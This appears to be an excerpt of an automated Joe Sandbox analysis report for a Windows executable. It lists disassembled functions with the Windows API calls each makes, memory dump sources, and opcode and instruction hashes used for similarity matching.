                                                            • Opcode Fuzzy Hash: 1f6a59968bef247e7c72ba54edd17769c1de40484eb90d805b6a0334dce9beb2
                                                            • Instruction Fuzzy Hash: 12115B7490010DCFCF04EFA8D8519EEB7B8FF65308F148569D896E7256EB32A90ACB51
                                                            Function 0088EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0088EF1B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0088EF4B
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0088F07E
                                                            • CloseHandle.KERNEL32(?), ref: 0088F0FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: d9da52839848809fa6b356f2103904c206c16cd2f147edcaba51cb7da4bc167e
                                                            • Instruction ID: 726241fc026f092458100cb90cbb92dfe83b9c482092c65b803bc91d26fe70df
                                                            • Opcode Fuzzy Hash: d9da52839848809fa6b356f2103904c206c16cd2f147edcaba51cb7da4bc167e
                                                            • Instruction Fuzzy Hash: 288152716047119FD720EF28C856F6AB7E9FF88710F14881DF699DB292DB70AC448B92
                                                            Function 008902C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 008910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890388
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008903C7
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0089040E
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0089043A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00890447
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: e9cf8fae18026fe22bf7f1a696a09865cb8abf70e69c06dfd98d7ea18ce8251a
                                                            • Instruction ID: 58b8a2d65dcb419743abbdceb403c1efc4985cb3969e9b61a0637820dec97c4c
                                                            • Opcode Fuzzy Hash: e9cf8fae18026fe22bf7f1a696a09865cb8abf70e69c06dfd98d7ea18ce8251a
                                                            • Instruction Fuzzy Hash: EC514B31208205AFDB04EB58D881EAEB7E8FF84708F08892DF595C7292DB30E944DB52
                                                            Function 0088DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0088DC3B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0088DCBE
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0088DCDA
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0088DD1B
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0088DD35
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00877B20,?,?,00000000), ref: 00815B8C
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00877B20,?,?,00000000,?,?), ref: 00815BB0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 35fa42cde3af2999441091812c8b522567693a433fa6e2e889f118d1d42391bd
                                                            • Instruction ID: 52b4a4cc37cf0c2e255bcfb314469278d84a3a9795a619c8cc9c0a656564d8f0
                                                            • Opcode Fuzzy Hash: 35fa42cde3af2999441091812c8b522567693a433fa6e2e889f118d1d42391bd
                                                            • Instruction Fuzzy Hash: 79511775A00209DFCB04EFA8C4949ADB7F9FF58310B148069E959EB362DB34ED85CB91
                                                            Function 0087E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0087E88A
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0087E8B3
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0087E8F2
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0087E917
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0087E91F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a5bd20868ed4fbf3c230768f366e67477b645fa9db00800e7b8739b883d2a589
                                                            • Instruction ID: abc84ba0d4e0498e467476ed93743b0fec3e57c2f7d6524c3039686765dd4945
                                                            • Opcode Fuzzy Hash: a5bd20868ed4fbf3c230768f366e67477b645fa9db00800e7b8739b883d2a589
                                                            • Instruction Fuzzy Hash: 11511C75A00205DFCB05EF68C991AADBBF5FF48314B1480A9E949EB362CB31ED51CB51
                                                            Function 0089A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f4756cabc0019121dd8d46244f346b97355b38ebaf2eb146029427881e65e0d
                                                            • Instruction ID: 5dfcbbba3dfa5597871f831bb44031d8066236504557b1589570089f0ff1b7aa
                                                            • Opcode Fuzzy Hash: 2f4756cabc0019121dd8d46244f346b97355b38ebaf2eb146029427881e65e0d
                                                            • Instruction Fuzzy Hash: 0141D535A00108AFDB18FF28CC44BA9BBA4FB09310F1D4165F955E72D1D770AD51EA91
                                                            Function 00812344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00812357
                                                            • ScreenToClient.USER32(008D67B0,?), ref: 00812374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00812399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 008123A7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 2cefc44173ad15d1a1d858e83ab0eee33d70609458ddb7caf7a8ef03dcd351c7
                                                            • Instruction ID: a18cf1f1ae1a103723903ff61d7f9d034a8fc4f6b9d95f1ccf78bc8609c34943
                                                            • Opcode Fuzzy Hash: 2cefc44173ad15d1a1d858e83ab0eee33d70609458ddb7caf7a8ef03dcd351c7
                                                            • Instruction Fuzzy Hash: 76416E71504119FBDF199F68C844AE9BB78FF05364F20431AF838D22A0C77459A0DBA1
                                                            Function 00866920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0086695D
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 008669A9
                                                            • TranslateMessage.USER32(?), ref: 008669D2
                                                            • DispatchMessageW.USER32(?), ref: 008669DC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008669EB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: 579309f614802b53944a9e3ceeec2b433b1571c8ceec1cbdec16ca9c92e4057b
                                                            • Instruction ID: 1f0bb6da07598d6362b92c9bed6958eb1e6b4abb63451c036752b67031c38f89
                                                            • Opcode Fuzzy Hash: 579309f614802b53944a9e3ceeec2b433b1571c8ceec1cbdec16ca9c92e4057b
                                                            • Instruction Fuzzy Hash: 2A31C23190129AAADB24DFB4DC44FB67BACFB11314F194266E821D21A1F73498B5DBA0
                                                            Function 00868F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00868F12
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00868FBC
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00868FC4
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00868FD2
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00868FDA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: fea7cd2bc4158c83f6ecc2ea1d68d945b0511fb6c77163d2084945739932c3d1
                                                            • Instruction ID: 9c374de729f06bb2911e8a7636a41c7e67e7c904f9bfd0904ef03b0ceae6f73f
                                                            • Opcode Fuzzy Hash: fea7cd2bc4158c83f6ecc2ea1d68d945b0511fb6c77163d2084945739932c3d1
                                                            • Instruction Fuzzy Hash: 4A31EE71500219EFDF14CFA8D94CA9E7BB6FB04315F114229FA28EA1D1CBB09950CB90
                                                            Function 0086B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0086B6C7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0086B6E4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0086B71C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0086B742
                                                            • _wcsstr.LIBCMT ref: 0086B74C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 87b4644b9f69aaf851642f43b5b1078d276faca235e36bc478c140181fd4896b
                                                            • Instruction ID: fcbd73cd1c9e0c608861f5d18ea9890837b2afe80b32f74a1127c261c8149708
                                                            • Opcode Fuzzy Hash: 87b4644b9f69aaf851642f43b5b1078d276faca235e36bc478c140181fd4896b
                                                            • Instruction Fuzzy Hash: 3F21F931204244BBEB295B79DC49E7B7BACFF95724F05403AFD05CA1A2EF61DC8096A1
                                                            Function 0089B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089B44C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0089B471
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0089B489
                                                            • GetSystemMetrics.USER32(00000004), ref: 0089B4B2
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00881184,00000000), ref: 0089B4D0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 834fec6140089f012f5fb772eb1a3da1797ddca1ae57a22b1d697022f2d880e6
                                                            • Instruction ID: 0d55c4fcf07c28bc07ecc72c60cde255c19199c333ac3df7093206cd0ca5b6d4
                                                            • Opcode Fuzzy Hash: 834fec6140089f012f5fb772eb1a3da1797ddca1ae57a22b1d697022f2d880e6
                                                            • Instruction Fuzzy Hash: 3421B571610255AFCF14AF38ED04A6A37A4FB05724F194739F926D71E2E7309C20EB84
                                                            Function 008697E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00869802
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00869834
                                                            • __itow.LIBCMT ref: 0086984C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00869874
                                                            • __itow.LIBCMT ref: 00869885
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: d775f05838d3da0e35f1e32e63aa5e60527b238d5043bd8583d90f87d96ed22f
                                                            • Instruction ID: 9733955dc1ec171e5a5d40024bd4d7f39b49feb60a7ab0b084cdda9a1c0c7851
                                                            • Opcode Fuzzy Hash: d775f05838d3da0e35f1e32e63aa5e60527b238d5043bd8583d90f87d96ed22f
                                                            • Instruction Fuzzy Hash: 2A219831700208ABDB11AA659C86EEE7BBDFF49710F094039FE45DB291D6708D45D7D2
                                                            Function 008112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0081134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0081135C
                                                            • BeginPath.GDI32(?), ref: 00811373
                                                            • SelectObject.GDI32(?,00000000), ref: 0081139C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 9f160c1ba698883a3251369b9fc7e4ca4831bc6e375fd583b09c43fe9f0f83a2
                                                            • Instruction ID: b60af1dc1b81700e730b64820d576978c7c7678f412d99590130daf87019e07d
                                                            • Opcode Fuzzy Hash: 9f160c1ba698883a3251369b9fc7e4ca4831bc6e375fd583b09c43fe9f0f83a2
                                                            • Instruction Fuzzy Hash: 8821287080120CEBDB119F65EC087A97BACFB10362F148327E920D66A5E77599A1EB91
                                                            Function 0086C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: ad5f0338c099092460bdccd887df9493a6543d21a3cb027ab4820ada55c0a237
                                                            • Instruction ID: 9a1c955e9b309cda53bb867aba44e1ad1bf1319bba995499409da54320d14490
                                                            • Opcode Fuzzy Hash: ad5f0338c099092460bdccd887df9493a6543d21a3cb027ab4820ada55c0a237
                                                            • Instruction Fuzzy Hash: 0A01F5B260510A7BE614A6295C46FBB735CFB637A8F054021FD05DA383FA54EE1182E1
                                                            Function 00874D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00874D5C
                                                            • __beginthreadex.LIBCMT ref: 00874D7A
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00874D8F
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00874DA5
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00874DAC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: e1aab81d57481be679236bee254af93bc29bdb63b46c1060f5f107577d947c64
                                                            • Instruction ID: 10e6ae7a2478134efa4ce6041ec7dbe9fe0b477ae70fd6bc7edb130b3cff3709
                                                            • Opcode Fuzzy Hash: e1aab81d57481be679236bee254af93bc29bdb63b46c1060f5f107577d947c64
                                                            • Instruction Fuzzy Hash: E41104B2904248BFC715ABACDC08A9A7FACFB45320F188366F918D3355E775CD5487A0
                                                            Function 0086874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00868766
                                                            • GetLastError.KERNEL32(?,0086822A,?,?,?), ref: 00868770
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,0086822A,?,?,?), ref: 0086877F
                                                            • HeapAlloc.KERNEL32(00000000,?,0086822A,?,?,?), ref: 00868786
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0086879D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: d6bbed922432f3d871d8ba9aa611586cc68964688d291117149430419f385080
                                                            • Instruction ID: 3fe73c1446dab4b269c5efa149d177e2c95c1d2395aa82ea9e9e60a28f62064c
                                                            • Opcode Fuzzy Hash: d6bbed922432f3d871d8ba9aa611586cc68964688d291117149430419f385080
                                                            • Instruction Fuzzy Hash: A3016971200204FFDB255FA6DC88D6B7BACFF8A356B24053AF949D2260DA318C00CBA0
                                                            Function 008754E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
